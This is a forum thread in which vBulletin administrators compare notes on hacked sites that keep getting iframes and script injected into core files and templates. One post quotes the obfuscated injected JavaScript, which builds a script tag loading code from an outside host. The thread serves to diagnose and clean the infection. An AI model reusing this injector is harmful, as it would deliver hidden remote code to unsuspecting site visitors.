No announcement yet.

A fix if your site is already exploited

  • Filter
  • Time
  • Show
Clear All
new posts

  • #31
    I got hit with the same bug too, cleaned it and now its back again 1 day later. I re-uploaded all my vbulletin files, changed every password possible, make sure any plugins I am running are up to date and they STILL got in.

    How the heck can we stop this from happening again? I'm about ready to start looking at other forum software.


    • #32
      Third party addons? You cleaned the damage, but did you find the source? If you move to another software and the backdoor is still in place it wont matter.

      Your addons being up-2-date help, but its not 100% if the problem is resolved. The addons you're running might still have issues, if the developer hasn't fixed them, or worse doesn't know about them.


      • #33
        Hi, same problem for me, vBulletin 4.1.11, but the problems started with the 4.1.10. vBSEO has been updated with the patch released in January. I removed almost all the plugins/products (all products were updated to their latest version), deleted suspect file diagnostics, replaced any files not containing the expected contents, changed every password possible.
        In my case iframe are inserted in this files : init.php, content.php, vbulletin-core.js (this only with the 4.1.11 version).
        I put lots of rules in the file .htaccess, for 10 days there were no attacks, but since last friday have resumed.
        I know that's not fair to list the installed products, however, a cross-check can be of help.
        Sorry for my bad english.


        • #34
          OK my host tell me that they removed a file called vbseo.php which they said was encoded with php but didn't have anything to do with vBSEO. Personally, I guessed that was a story to justify the $200 they charged me after I told them I'd managed to fix everything. But it might be relevant.

          I haven't seen this file or its contents.


          • #35
            Originally posted by Mitchh View Post
            var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
            If you decode the numbers from the second fromCharCode() you get the following URL:


            This URL loads into a secret iframe, which some antivirus softwares like Avast complain about

            Did get the same problem... secret iframe that finally leads to ... many antivirus of my visitors complained about it..

            via phpmyadmin I have found this code in 5 of my template... I have also found a strange "new" file in the root of the forum (verify_ojdojdosjdsj.php file) with some strange code in it (admins, if you want this file I can send it to you)

            I am under vBulletin 4.0.8 Patch Level 2 (vpublishing suite) So I will upgrade to the last version of vbulletin...

            For info I have 2 active plugins :
            - VBSEO (last version 3.6)
            - auto linker 1.1

            Blogs and CMS part of the publishing suite are disabled

            Any idea of how they came into the system? Any patch to prevent this in the future ?



            • #36
              just out of interest,.. how many people having this problem are with godaddy?


              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.